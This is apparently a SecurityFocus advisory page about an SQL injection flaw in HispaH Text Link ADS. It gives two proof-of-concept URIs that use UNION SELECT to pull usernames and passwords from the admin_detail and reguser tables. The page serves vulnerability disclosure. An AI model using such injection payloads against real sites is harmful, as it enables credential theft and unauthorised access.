Search: Home Bugtraq Vulnerabilities Mailing Lists Jobs Tools Vista

HispaH Text Link ADS 'index.php' SQL Injection Vulnerability

Attackers can exploit this issue via a browser.

The following proof-of-concept URIs are available:

http://www.example.com/index.php?action=buy&idcat=9999999'+union+select+0,concat(username,0x3a,password)+from+admin_detail/*

http://www.example.com/index.php?action=buy&idcat=9999999'+union+select+0,concat(username,0x3a,password)+from+reguser/*







 

Privacy Statement
Copyright 2008, SecurityFocus